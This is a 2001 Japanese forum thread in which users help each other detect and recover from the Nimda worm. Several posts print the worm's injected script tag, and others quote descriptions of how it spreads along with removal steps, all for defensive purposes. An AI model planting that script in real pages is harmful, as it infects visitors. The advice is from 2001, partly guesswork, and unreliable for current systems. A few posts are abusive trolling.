>>527
MSNがそれだけ糞サイトということですよ(藁)
531:01/09/19 18:51 ID:iK.BW4jo
>>529
わかった。そうする。
ところで、どのVerがお勧め?
(寝助、使った事無いからな〜)
532 :01/09/19 18:51 ID:VnO8pFQc
MNSに逝く人って、何の用事があって逝くわけ?
533 :01/09/19 18:52 ID:nqb1CbEs
Windowsの検索でor検索ってどうするんだっけ?
534( ゚д゚)ゴルァ!:01/09/19 18:52 ID:2Btp1QlY
ろくに自分とこのホームページのセキュリティも確保できないような
MSNがJavaScriptオンじゃないと見れないようなサイト作るな( ゚д゚) !
535タイトル見る度に:01/09/19 18:54 ID:OVuG2WjM
スーパー初心者のためのMSNウイルスくれ。

に見えてしまう(鬱
536 :01/09/19 18:56 ID:8MvljIUI
こーゆー騒動のときWebメールって便利だな
537  :01/09/19 18:56 ID:qWuPgyw6
>531
4.75か4.78でいいのでは?
おれは4.75使ってるけど。
538:01/09/19 18:58 ID:iK.BW4jo
>>537
さんくす。家中のCD-ROM漁ってみる。
539名無しさん2.31J ◆4loliTas :01/09/19 18:59 ID:bX0LC2XI
>>531
537に同意。
私は4.78使ってます。
540(・∀・)イイ!:01/09/19 19:00 ID:GuXyBCPA
>>532
MNSに逝く人って?
541nc使用:01/09/19 19:03 ID:dn5covrA
ver4.78に一俵
542MNS:01/09/19 19:04 ID:Vsdv/Nrc
http://www.mns.org.my/
マレーシアの自然を守ろうね。
543 :01/09/19 19:04 ID:BvaOJetc
ネスケの4.xxってCSSの解釈がボロボロじゃなかったっけ?
544 :01/09/19 19:05 ID:BvaOJetc
かといって6.xは重すぎて使えないし…。
545 :01/09/19 19:05 ID:f1RIjs76
>>532
MNSには逝かんが。
単にセットアップデフォルトを変更してないだけでは。

……って、デフォルトは/homeなのか?
546 :01/09/19 19:05 ID:186vJgXg
>>542
たしかに多くの人は逝く用事ないなこのページ(w
547 :01/09/19 19:06 ID:BnRrb8v.
>>544
IE使えよ。
548  :01/09/19 19:07 ID:4YsZA8ZQ
IE6を入れたけど、設定は何もいじらなくて
いいのかな?
549スーパー初心者:01/09/19 19:07 ID:7rqO8AWk
問題が発生したため、Microsoft Internet Explorer を終了します。 ご不便をおか
けして申し訳ありません。

↑みたいなメッセージがでてきてサイト見ようとしてもすぐウィンドウが閉じちゃう
んだけど、どうなってんの?
以前5.5落とした時も同じエラーメッセージがでて使えずにずっと5.0使ってる
んだけど…
550 :01/09/19 19:07 ID:vArgEgZM
>>515
うちも同じ表記だったから大丈夫でしょ。
ちなみに10日前に、5.5SP2入れたばかりでした。
551 :01/09/19 19:08 ID:bi15wNtM
>>514
かわいそうなのでレス。
『*.eml』『readme.exe』『MEP51B3.TMP.EXE』 を「名前」にいれます。
『』←これはいりません。
「探す場所」はC:です。
552 :01/09/19 19:09 ID:0vW2CaDA
今日の朝、思いっきり感染サイトが掲載されていたけどな(まらまら
553:01/09/19 19:09 ID:0vcXMVMA
554 :01/09/19 19:11 ID:.MhNxNaQ
えっと。毎週水曜日に同期をとらなくてはいけないページがあるんですが、ウィルス対策をしてると無理ですよね
アクティブXもjava関連もダウンロードも無効にしてると、同期どころかページも表示されませんよね・・・・
おとなしく寝ろって事ですか?いつになったら大丈夫になるんですかね?結局WEBを見ないとわかんないですよね
24時間体制でインターネット関連情報を流してくれるTVがあるといいんですが・・・
555クチビルゲ:01/09/19 19:11 ID:tY/Cq936
>問題が発生したため、Microsoft Internet Explorer を終了します。 ご不便をおか
>けして申し訳ありません。

ハゲシクワラタ
こんな低姿勢のメッセージMSが出すわけないもんな
>>549
質問するならマナーくらい考えろや
556zz:01/09/19 19:12 ID:Pk6nKAOM
すみません、この掲示板いじくってたら今readme.exeをダウンロードしますか?

って出てきたんですけど・・・これって

まだ無事ですか?
557 :01/09/19 19:15 ID:2Y/4gKjw
>>556
他にコッソリと別のIEが立ち上がってると思われ
558名無し募集中。。。:01/09/19 19:16 ID:rl7votQQ

ウイルスバスター2001のパターンファイル番号は、現在「942」です。

ノートンアンチウイルス2001のパターンファイルは、9月18日版で定義数54005個です。
559  :01/09/19 19:16 ID:UgwcW/wo
そんな事よりみんな、ちょいと聞いてくれよ。スレとあんま関係ないけどさ。
このあいだ、ウィンドウズアップデートのサイト行ったんです。アップデートの。
そしたらなんか人がめちゃくちゃいっぱいでDLないんです。
で、2chに戻ったらなんか警告出てて、WEBを見るだけで感染するウイルス、
とか書いてあるんです。もうね、アホかと。馬鹿かと。
お前らな、ウイルス如きで普段来てないにアップデートサイトに来てんじゃねーよ、ボケが。
ウイルスだよ、ウイルス。
なんか親子連れとかもいるし。一家4台で感染か。おめでてーな。
よーしパパIE6もDLしちゃうぞー、とか言ってるの。もう見てらんない。
お前らな、ウイルス送ってやるからメアド教えろと。
アップデートってのはな、もっと殺伐としてるべきなんだよ。
回線の向こう側に座った奴といつ喧嘩が始まってもおかしくない、
ハクるかハクられるか、そんな雰囲気がいいんじゃねーか。初心者は、すっこんでろ。
で、やっと繋がったかと思ったら、隣の奴が、ネスケにしろ、とか言ってるんです。
そこでまたぶち切れですよ。
あのな、ネスケなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、ネスケにしろ、だ。
お前は本当にネスケを使いたいのかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、自分のヲタサイトがネスケにしか対応してないだけちゃうんかと。
アップデート通の俺から言わせてもらえば今、アップデート通の間での最新流行はやっぱり、
IE5.01、これだね。
IE5.01アラブ語フォント同時DL。これが通の落とし方。
アラブ語フォントってのはアラブ語が読める。そん代わりDLに時間がかかる。これ。
で、それに韓国語フォント(ハングル)。これ最強。
しかしこれを落とすと次からCIAと2chねらーにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前、1は、新型ウイルスでも食らってなさいってこった。
560(;´Д`)@ドリー:01/09/19 19:16 ID:0vcXMVMA
Winユーザーは大変だね。
561zz:01/09/19 19:17 ID:Pk6nKAOM
>>557さん

え、どう言う事なのでしょうか?

既に感染していると言う事でしょうか?
562 :01/09/19 19:19 ID:y3NKkmi6
>>549
わしのもです!IE5.5⇒6bにしてもなる。なんでやろな?
563名無しさん:01/09/19 19:19 ID:Y0FK2RD.
>>559
ウイルスverワラタ
564549@スーパー初心者:01/09/19 19:20 ID:7rqO8AWk
>>555
そうですね。読み返してみて自分でも問題あるなって思いました。すみません。

いろいろ試しているのですが、どうしてもだめみたいです。
よろしければどなたか教えていただけないでしょうか?
565 :01/09/19 19:21 ID:EV7ASG32
>>559
コピペワラタ。
〜のかと問いたい。問い詰めたい。小1時間問い詰めたい。
ここがいちばん面白いね。
566笑死:01/09/19 19:21 ID:Zp7vMJB6
>>559
めたくそ藁ったぞ
567  :01/09/19 19:21 ID:YhNWzPO6
>>559
これのコピペっていつも面白いこと考えるよね。
ほんと関心する。
568奈々氏:01/09/19 19:24 ID:8HDieZTU
あの・・ IE5.5SP2をDL&installしたんですが、
IEのversionが5.51.4807.2300ってなってるんです。

ver 5.50.4807.2300っていうのは他の解説サイトにも載ってたんですが、
これって大丈夫なんでしょうか?
ちなみにOSはWin Me です。よろしくお願いします。
569 :01/09/19 19:24 ID:qo8.QZ3.
>>567
ワシも好き

でどんな症状でるの?
570557:01/09/19 19:23 ID:2Y/4gKjw
>>561
ここが問題なのではなくて、どこか別のサイトが問題てことです
IE5.5SP2か、IE6でないなら感染してるはず
571:01/09/19 19:29 ID:Vn9GJDAo
>>561さん

そうですか、どうもすみません。SP2入れたばかりなので心配でして。
572_:01/09/19 19:31 ID:Zp7vMJB6
ちょいと聞きたい。
IE5.5−SP2以下の人って
JAVA&ActiveXをOFFってても
感染するんでしょうか?
573 :01/09/19 19:32 ID:BvaOJetc
>>572
JavaScriptを切ってれば大丈夫。
574  :01/09/19 19:34 ID:0vW2CaDA
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
これを起動できないようにするためにJavaScriptオフ。
575_:01/09/19 19:34 ID:Zp7vMJB6
>>573
かたじけない
576nanashi:01/09/19 19:35 ID:HFixfMC6
IE5.0で昨日MSN見たけどなんの感染もなかったよ。
多分いつも「こいつアンインストールしようかな?」と思ってた
メガネが似合うノートンのオヤジがPCを守ってくれた。
577 :01/09/19 19:35 ID:vHNMmWF6
IE6導入したら「Д」が太字で表示されるようになったんだけど…
578 :01/09/19 19:35 ID:Aa1u4F6I
ところで「スクリプトによる貼り付け処理の許可」って何をするものなんですか?
579  :01/09/19 19:36 ID:UgwcW/wo
>574
またエロいタグ入れてんな〜これ。
でもjavascript切ったら見れるサイトかなり減るよね。
580 :01/09/19 19:36 ID:KNoHMc4Y
581 :01/09/19 19:38 ID:qq6rhHg6
Windows2000severに*.emlファイルが数百個出来てます。
削除してもまたいつのまにか作成されています。
どうしたらいいんでしょうか?誰か助けて〜!!
582nanashi:01/09/19 19:40 ID:HFixfMC6
>>581
フォーマット
583名無しさん2.31J ◆4loliTas :01/09/19 19:39 ID:bX0LC2XI
AAズレるぞゴルァ!って人や
顔文字が不細工になったじゃねーか!って方はネトスケープに移行しましょう
ftp://ftp.netscape.com/pub/communicator/japanese/4.78/windows/windows95_or_nt/complete_install/cc32d478.exe
584_:01/09/19 19:40 ID:WrfZcpZQ
95ユーザでSP1までしかアップデートできないんだけどマズイですか?
585 :01/09/19 19:41 ID:qq6rhHg6
>>582
絶対いやだ!再インストールめんどくさいです。
っていうか初期化するしか対処方法ってないんですか?
586 :01/09/19 19:41 ID:plawXAu.
>581
なんでW2Kseverなんか入れたのって聞きたい。。。
そんな人が観戦するなんて信じられない〜〜
OSを再インストしてください。。。
587名無しさん:01/09/19 19:43 ID:Y0FK2RD.
悲惨な>>581
588581:01/09/19 19:43 ID:qq6rhHg6
×Windows2000sever
○Windows2000server
589 :01/09/19 19:43 ID:E8Omc7/c
検索しても引っかからなかったから、取りあえずは大丈夫かな…。
590 :01/09/19 19:44 ID:qq6rhHg6
>>586
会社のサーバーなんですよ。
クライアントが感染してサーバーも感染・・・。助けて!!
591よくわからん:01/09/19 19:46 ID:mZcCViNs
感染すると、どんな症状になるの?
592 :01/09/19 19:46 ID:AHjGuvE2
IE5.5SP2でjava関連とかダウンロードとかOFFにしてると
同期って出来ないんですか?
593 :01/09/19 19:47 ID:yNH4JnFA
>>590
自分が踏み台になりたくなかったら、駆除ツールを待つ前に
速やかに再インストするしかないのでは?
594 :01/09/19 19:47 ID:vHNMmWF6
IE6導入したら「Д」が太字で表示されるようになったんだけど…
これは直せないんでしょうか?
595 :01/09/19 19:48 ID:plawXAu.
>590
会社に管理者いないの?
W2Kserver入れてるなら対処法も解るでしょ?
再インストの要領のいいやり方だってあるよ。
どんなアプリが入ってるかわかんないからアドバイスなんて出来ない
あなたが、管理者じゃなかったら管理者に聞いてみるのが一番。。。
596  :01/09/19 19:48 ID:UgwcW/wo
>594
フォント変えてみたら?
597うまぁ:01/09/19 19:49 ID:BnRrb8v.
>>594
ほんとた。(゚Д゚)
598 :01/09/19 19:50 ID:bqy1fLvU
2ちゃんの顔文字が表示できないブラウザなんてクズだ、
599 :01/09/19 19:50 ID:0vW2CaDA
(°д°)藁
600 :01/09/19 19:50 ID:wFkfN8VY
更新バージョンのところがSP2になってればよいわけれすかあ?
601 :01/09/19 19:50 ID:bqy1fLvU
(´ー` ) これの目が怖くなってませんか?
602 :01/09/19 19:50 ID:BnRrb8v.
なんかブッシュのAAがおかしいとおもったらIE6のせいか。
603nanashi:01/09/19 19:50 ID:HFixfMC6
>>590
MSに「MSNのせいで感染した裁判だぁー」って言え。
まずそこからスタート
604nanasisan:01/09/19 19:51 ID:VCih6ARI
# 帰ってきたよん
>>600
そうです。ただしウイルスが入ってこられないようになっただけなので、
念のためウイルスチェックしましょう。
605なってないよ。:01/09/19 19:51 ID:5ntG1LP.
(*´ー`)
606imo:01/09/19 19:51 ID:dfQQPFrw
おみとろんにて、
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
をカットすれば安全
607 :01/09/19 19:52 ID:TUtUByPw
かちゅーしゃとかバグ、ドーナツ等タブブラウザ使えば
AAが表示できると初心者向けスレでいわれたがウソなのか?
608  :01/09/19 19:52 ID:vHNMmWF6
たらこ唇みたいで笑える(゚Д゚)
609ど素人:01/09/19 19:52 ID:OIo7N1KQ
あの。。5.5ってよくクソブラウザとか言われてません?
(理由は全然知らないんですが)
自分今、5.01SP1なんですけど、5.5より
5.01SP2にしといた方が無難でしょうか?
610名無しさん:01/09/19 19:52 ID:Y0FK2RD.
ひろゆき??
611 :01/09/19 19:53 ID:qq6rhHg6
やはり再インストしかないのか。。。鬱だ・・・。
駆除ツールでないのかな・・・。
612 :01/09/19 19:53 ID:0vW2CaDA
(σ´一`)σ
613nanasisan:01/09/19 19:54 ID:VCih6ARI
>>590
いちおうマジレスしておこうかな。
まずはウイルスが入らないようにするため、クライアントとサーバはそれぞれ
ウイルスチェック。もちろん全てのファイルを対象にするのと、パターンファイル
は最新に。あとネットワークケーブルはそれぞれ外しておくように。

もしウイルスチェックを購入してないのなら今すぐ(まだ店によっては開いてる
ので)購入した方がよい。

ウイルスが駆除できたら、IEの最新バージョンをインストールする。
IE5.01SP2かIE5.5SP2かIE6.0。どれでも良い。

あとはサーバ側はhttp://www.microsoft.com/japan/security/を参考に
IISのセキュリティパッチを出来る限り入れること。
614 :01/09/19 19:54 ID:AHjGuvE2
ウィルスチェックってどうやるんですか?
615 :01/09/19 19:54 ID:no0J2SFs
IE6ダウンロードのついでにOutlookとメディアプレイヤー
バージョンうpしたら、起動がめちゃめちゃ早くなった。
漏れだけ?
616:01/09/19 19:54 ID:VtoXwPDk
・・・どうでもいいけど
アナログだと2時間もかかる(^^;

つか とりあえず2chしか見ないし エロ画像落としたりしないし
大丈夫そうだし何もしない!
617 :01/09/19 19:55 ID:bqy1fLvU
(;´Д`) 5,5にしただけでこれがおかしく表示されるようになったので
5、01に戻した
618nanasisan:01/09/19 19:55 ID:VCih6ARI
>>614
ウイルスチェックのソフトウエアはインストールしていないのか?
Windows標準の機能じゃないんで、インストールしていなければ不可能。
619 :01/09/19 19:57 ID:qq6rhHg6
>>613
ありがとうございます!
IISパッチ入れときます。
620614:01/09/19 19:57 ID:AHjGuvE2
買うんですか?MEですが、標準であったような・・・気のせいかな
あとWEB上のページの同期をとっても平気なの?
621 :01/09/19 19:58 ID:plawXAu.
パッチ入れても観戦後だと・・・まっいいか。。。
622(σ´一`)σ :01/09/19 19:58 ID:0vW2CaDA
>>611
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
499 :感染しちゃった人へ :01/09/19 04:02 ID:NRln1zEY
Code Blue ワームをコンピュータから削除するには:

Regedit を使用して、HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run レジストリ キーを見つけます。
C:\svchost.exe に対するレジストリ エントリを見つけて削除します。
C:\svchost.exe というファイルを削除します。
システムに C:d.vbs というファイルが残っていれば、それを削除します。
コンピュータを再起動します。

http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html
623nanasisan:01/09/19 19:58 ID:VCih6ARI
>>616
とりあえずjavaとjavascriptとActiveXだけでもオフにしておけば良い。
見られないサイトとか出てくるかも知れないけど、安全とトレードオフ。
624 :01/09/19 19:59 ID:186vJgXg
>>620
パソコンによっては買ったときにインストールされてるよ
マニュアルみてくれ
625609:01/09/19 19:59 ID:OIo7N1KQ
AAがずれるから駄目って言われてるんですか?>5.5
それ嫌だから5.01SP2にしよっと。
626 :01/09/19 20:00 ID:qq6rhHg6
>>611
CodeBlueじゃなくてニムダだと思いますけど・・・。
627nanasisan:01/09/19 20:00 ID:VCih6ARI
>>620
Me標準だと5.5くらいだったと思うので、とりあえず最新バージョンをダウンロードしてインストール。
無償(プロバイダ料金と通話料は別)でダウンロードできる。
628620:01/09/19 20:01 ID:AHjGuvE2
>>624
はい。
629626:01/09/19 20:01 ID:qq6rhHg6
>>622
でした。
630(σ´一`)σ :01/09/19 20:02 ID:0vW2CaDA
>>611
すみません。Code Blueの対策でした。
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html
631 :01/09/19 20:02 ID:Ut1PoXGM
>>618
トレンドマイクロのオンラインスキャンじゃダメ?
632620:01/09/19 20:02 ID:AHjGuvE2
ME、IE5,5SP2です
633nanasisan:01/09/19 20:03 ID:VCih6ARI
>>631
OK。今日の午後以降ならちゃんとnimdaを検出できるパターンファイルになっているので。
634 :01/09/19 20:05 ID:m9yCiymc
>>622
うちの、社内のWEBサーバー感染したけど、Code Blueとは全然症状が違うよ。
やっぱり、ニムダの修復方法を取らないと。
でも、まだ発表されてないし、恐らく無理で再インストになりそう。
635nanasisan:01/09/19 20:07 ID:VCih6ARI
>>632
IE5.5SP2ならすでに対処済み。念のためウイルスチェックして引っかからなければ完了。
636 :01/09/19 20:07 ID:CSf5uW9s
JavaScriptを切るってどうやるんですか?
637620:01/09/19 20:08 ID:AHjGuvE2
ありがとうございます
638 :01/09/19 20:08 ID:jRZmvYDw
まだ感染後の削除方法ないのか・・・
639^^。:01/09/19 20:08 ID:YqOIBj/g
nanasisan、朝から働きどおしだ。NYの消防士みたい。
ガムバレ!(って言うしかないへたれな自分)
640 :01/09/19 20:08 ID:WAquPYog
5.01sp2なんだけど、どうなのよ?
641nanasisan:01/09/19 20:09 ID:VCih6ARI
>>639
俺ってこのまま明日まで眠れなかったりして(藁
そしたら今晩中にAnti-nimdaソフトウエアでも作って公開した方が早いかもー、
とか思いつつある。
642 :01/09/19 20:09 ID:mszmukrE
ノートンでウィルススキャンしたらNIMDA検出されました。
ノートンなら駆除できるんですか?
643  :01/09/19 20:09 ID:UgwcW/wo
スーパー初心者スレだからあんまり言いたくないけど、
少しは過去ログ読もうよ。答える方も大変だって。
644 :01/09/19 20:10 ID:NfmXYK86
>>633
そうなんだ
貴重な情報、感謝
645nanasisan:01/09/19 20:10 ID:VCih6ARI
>>642
とりあえず駆除させてみてください。たぶんいけるはず。
駆除したら再度スキャンして、引っかからなければOK。

>>640
問題なし。ただし昨日今日にバージョンアップしているのなら、念のためウイルスチェック。
646マジで俺は時代遅れ:01/09/19 20:11 ID:ws0.K2NE
java,javascript,ActiveX,レジストリ エントリ,インストール,
IISパッチ入れる・・・・

このスレで出てくる言葉はほとんどわからない。
だから、トップにあるリンク情報を開いても、
なにをいっているのかさっぱり分からない。

「どこどこのお店に行って、『〜〜をください』と言って、
それを左から何番目のキーを押して何がでてきたら、どの
アルファベットを押すと何がでて・・・・」ってないい方は
きっと誰もしてくれない。
勉強したいが、何を読んでいいのか分からない。
『これ一冊で、パソコン博士』ってな本はないだろうか。
647 :01/09/19 20:11 ID:186vJgXg
>>642
駆除はまだできないんじゃない?
648名無し:01/09/19 20:12 ID:GEWbAhZY
261 名前:名無し募集中。。。 :01/09/19 20:07
http://61.208.221.9/
649名無しさん:01/09/19 20:12 ID:zS/llu.E
>>646
慣れればわかるYO
セキュリティーの本読めばすぐ分かるかもYO
650 :01/09/19 20:13 ID:mszmukrE
>>645 >>647

レスありがとうございます。
早速、やってみます。
651<丶`∀´>ニダリッ:01/09/19 20:13 ID:plawXAu.
実は後穴が一番恐いYo!
652 :01/09/19 20:14 ID:LoP9L.6A
 だあ! 派遣先め、毎週重要ファイルだけはバックアップ取れって
言ってたのに、全く取ってない奴多すぎ。
 奴らは何のためにシスアドに金払ってるんだっての。
 つうわけで仕事にならんし、リセットアップまでやってやる義理(契約)
はないから、リセットアップ後のセキュリティ変更だけ教えて帰ってきた。
 てなわけで久々のアレ逝くか……
653 :01/09/19 20:14 ID:4YsZA8ZQ
俺も全然分からん、だからとりあえずIE6入れといた。
654 :01/09/19 20:14 ID:mszmukrE
ちょっと強引だが俺のID

MSずるむけロリエ
655nanasisan:01/09/19 20:14 ID:VCih6ARI
>>642
ゴメン。駆除っつーか削除だった。ファイルの中からウイルス部分だけ
消すんではなくて、ファイルごと消すしかないと思う(__)

>>646
そういうあなたにおすすめ。
http://windowsupdate.microsoft.com/
※ javascript切ってると見られないので注意。

ここで表示される「重要な更新」のところを片っ端からチェック入れて「ダウンロード」を押してください。
ただし、ここで入れても防御壁にしかならないので、既に感染してしまった場合は意味がないので注意。
感染しているかどうかを調べるにはウイルスチェック。
656 :01/09/19 20:14 ID:yNH4JnFA
>>636
>>243をみてくれ。
しかしSP2にするのが一番早いと思うけど。
657 :01/09/19 20:14 ID:GqyGDiw2
>>646
他はともかくとして、
「インストール」がわからんってのは如何なものかと・・・
658アレってこれ:01/09/19 20:14 ID:LoP9L.6A
状況報告ver1.05(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
 →java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。

LANによる感染
 社内に一人でも対策してないひとがいてノーパスとかにしていた場合
 LANの共有フォルダを使っても自己増殖する。

感染鯖
 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
659続き:01/09/19 20:15 ID:LoP9L.6A
状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
 *.emlが大量にHITした際は確定。
 ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
 そうでないときは後者2個を削除して様子を見る。
 といっても後者二つを消したからウイルスが消えるわけではない。
 ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
 感染してしまった後は、アップデートしても無意味。
 とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。

 感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

 ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
660CHRISTI:01/09/19 20:15 ID:qRY8meec
IE6.0を使っているんですが、Explorer exe.ってexeが付いているけど
感染しているのですか?おしえてください。
661 :01/09/19 20:16 ID:KkG4r6CE
5.5sp2へのアップデートのダウンロード中に
「タスクスケジューラ」のところで止まってしまう人いましたよね?
解決した人いますか?
662nanasisan:01/09/19 20:16 ID:VCih6ARI
>>652
まぁ、そういうもんだよ。重要なファイルが消えてしまったりするような
痛い目を見ないと何もしないってのは少なくとも日本国内では標準的。

アメリカのテロんときもそうだけど、対岸の火事くらいにしか見てないみたいだ。
663 :01/09/19 20:17 ID:plawXAu.
>660
一緒にラウンジに帰りましょ&hearts:
664 :01/09/19 20:17 ID:LoP9L.6A
>>660
 『.exe』は実行ファイルって意味。
 アプリならどんなもんにでもあると思ってくれ。
 問題なし!
665nanasisan:01/09/19 20:18 ID:VCih6ARI
>>660
それだけでは何とも言えません。わからないようならウイルスチェックを行いましょう。
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm
666 :01/09/19 20:19 ID:pP8e1su.
ワクチンが出きるまで2chにひきこもってよう・・
667禿同:01/09/19 20:19 ID:plawXAu.
>666
かちゅ〜しゃでね!
668nanasisan:01/09/19 20:20 ID:VCih6ARI
>>661
セーフモードで起動して、C:\Windows Setupなんとか
というディレクトリ(手元に確認できる環境がないのでゴメン)に
ie5setup.exeがあるはずなので、そこからインストールし直すと良いはず。
669CHRISTI:01/09/19 20:21 ID:qRY8meec
>>664-665
サンキュー!助かりましたぁ。(ほっ)
>>663
逝け
670 :01/09/19 20:23 ID:acpXbJak
>>661
IEのセキュリティーを中にしたらダウンロードできましたよ。
あとウィルスソフトも中止にして。
671 :01/09/19 20:24 ID:ehK3v1x6
何故、ウイルスで盛り上がってるんですか?
672 :01/09/19 20:25 ID:KkG4r6CE
>661
過去ログにありましたね…ちょっと見てみます。

>670
中にしてあるんですけどね…
673672:01/09/19 20:26 ID:KkG4r6CE
間違えちゃった。
>661→>668でした。
674 :01/09/19 20:28 ID:LoP9L.6A
>>671
 こいつが繁殖力と感染経路が伊達じゃない未曾有のウイルスだから。
 下手するとWEBコンテンツ見ただけでOUTレベル
675  :01/09/19 20:30 ID:0vW2CaDA
>>659
>とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、
>ワクチンが出来るまで他のWEBコンテンツを回らない。
いや、回線を切るか、再インストールをお勧めします。
-------------------------------------------------------------------
実行されと、正当なWindows DLLとRICHED20.DLLを置き換え、system.iniを次のように
改変することによりシステムをフックします:

Shell= explorer.exe load.exe -dontrunold

ワームは自分自身を%Windows System Directory%\load.exe とWindowsテンポラリ
ディレクトリにMEP*.TMP.EXEというテンポラリファイルとしてコピーします。
ワームは、新しいメールアドレスを見つけるためにMAPIを使って受信ボックス内
のメールを読みます。このMAPIの機能は、Outlook (Outlook Express)でサポート
されています。ワームは、本文の無い、ランダムな件名のメールにワーム自身を
添付し、独自のSMTPエンジンを使ってメールを送信します。
受信したとき、readme.exe はwav(音声)ファイルになりすましています。
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
-------------------------------------------------------------------
・MSNのOutLookメーラー使っている方は、他のメールソフトを使用することを
 お勧めします。私はBeckyを使用してます。
・C:\WINDOWS\system.ini
 のファイルの中に、Shell= explorer.exe load.exe -dontrunoldがあれば、感染してます。
676 :01/09/19 20:30 ID:0/11CXDg
IE5.5SP2にしたら動作が快適になったよ
今回の騒動で得した気分
677はやお:01/09/19 20:31 ID:icJAynfc
どうよ。そう思うだろ?
内定もらって、何か変わったか?
アメリカでテロがあって、お前に被害があったか?
これからの人生に面白みがあるか?
くだらなくて、退屈なことばっかりだろ?
生死、セックス。それだけ。あと金か。それだけだ。
臭いこと考えてる奴は一刻も早く死ね。
678ナナシサソ:01/09/19 20:31 ID:Hdj3suiA
スキャン開始するも、、、。
途中で強制終了、、、
こんなんでました
SCAN32 のページ違反です。
モジュール : MCSCAN32.DLL、アドレス : 0167:004d103f
Registers:
EAX=00000000 CS=0167 EIP=004d103f EFLGS=00010206
EBX=00000000 SS=016f ESP=0407d1b0 EBP=0407d780
ECX=000000af DS=016f ESI=00000000 FS=4767
EDX=0000001c ES=016f EDI=03dfcad6 GS=0000
Bytes at CS:EIP:
8b 08 ff 51 1c 39 c2 76 04 31 c0 eb 54 83 7c 24
Stack dump:
000000af 0407d7b6 00000000 0407dc20 004da228 00000000 03df019c 0407d798 10000763 00004000 00000061 00000100 00000000 00000000 00000000 00000000
679名無し:01/09/19 20:32 ID:GEWbAhZY
IE6最新版登場しました。

http://www.forest.impress.co.jp/article/2001/09/19/ie6jp.html
680失礼します:01/09/19 20:32 ID:uCR5LgWg
⇒感染したPCはCドライブをネットワーク共有する。

Cドライブがネットワーク共有しているか確かめるにはどうすれば
いいんでしょうか?
モノ知らずですみません。
681名無しさん:01/09/19 20:32 ID:MkQAsvbk
うわあ、IE5.5+SP1だよ。
まともに喰らうじゃん。
はあ、とりあえずウィルスチェックするか。。。
682CHRISTI:01/09/19 20:33 ID:qRY8meec
既出かもしれないけど、おしえてください!
友達がシマンテックのソフトで駆除したって言ってましたが、今回のもできるの?
683nanasisan:01/09/19 20:33 ID:VCih6ARI
>>678
McAfeeかな。ウイルススキャンをインストールし直す(アンインストールして、再度インストールする)と解決する可能性がある。
684クチビルゲ氏ね:01/09/19 20:33 ID:.FNeXM3I
低姿勢のメッセージ出るじゃねーか
テメーがマナー考えろや
685ナナシサソ:01/09/19 20:34 ID:Hdj3suiA
>>683
マジで有り難う。やってみます
686nanasisan:01/09/19 20:35 ID:VCih6ARI
>>682
>>468に書いておいた。
687659:01/09/19 20:36 ID:LoP9L.6A
>>675
 了解
『むしろ自他の被害の拡大を考えるならOSから入れなおした方がいい』
を追加します。
688 :01/09/19 20:37 ID:se/qq7uk
>>661
あんたもか?
わしもなんど5.5SP2ダウンロードしてインストールしようとしてもタスクスケジュ−ラの署名がどうたらこうたらのところで止まってしまって何度もやり直しになった。
時間の無駄なので6.0にしたら問題なかった。しかもきわめて快適じゃ
だだしISDNでダウンロードとインストールに1時間くらいかかったが・・
yahooの掲示板にもSP2にはタスクスケジューラに問題あるとカキコしてる人いたから何かあるのかもしらんな
689名無し:01/09/19 20:37 ID:ehK3v1x6
セキュリティーに気を配らない人を
対象にしたウイルスかあ。

ウイルス製作者はヤナ奴だな。
690 :01/09/19 20:38 ID:LoP9L.6A
>>684
 『低い姿勢』はMSのXP戦術のウリらしいです。
 CMでもやってます(藁)
691nanashi:01/09/19 20:38 ID:ME400ZYo
>>689
っていうか、狙ってやった感じがする。
サーカムが流行ってたときをさけて投入しようとしたけど、
テロが起きて、話題独占できないから一週間待って・・・・。ッて感じで。
考えすぎかな?
692CHRISTI:01/09/19 20:40 ID:qRY8meec
>>686
読んでもわかんないー。私は>>682だよ?
693 :01/09/19 20:41 ID:KkG4r6CE
661>688
やはりダメみたいです…
6にしようかな…ADSLなのでそんなに時間かからないと思うんだけど…
でも6は別の問題が後で発見されそうで怖い…

あー面倒だ…いっそネスケにするかな…
694名無し:01/09/19 20:41 ID:GEWbAhZY
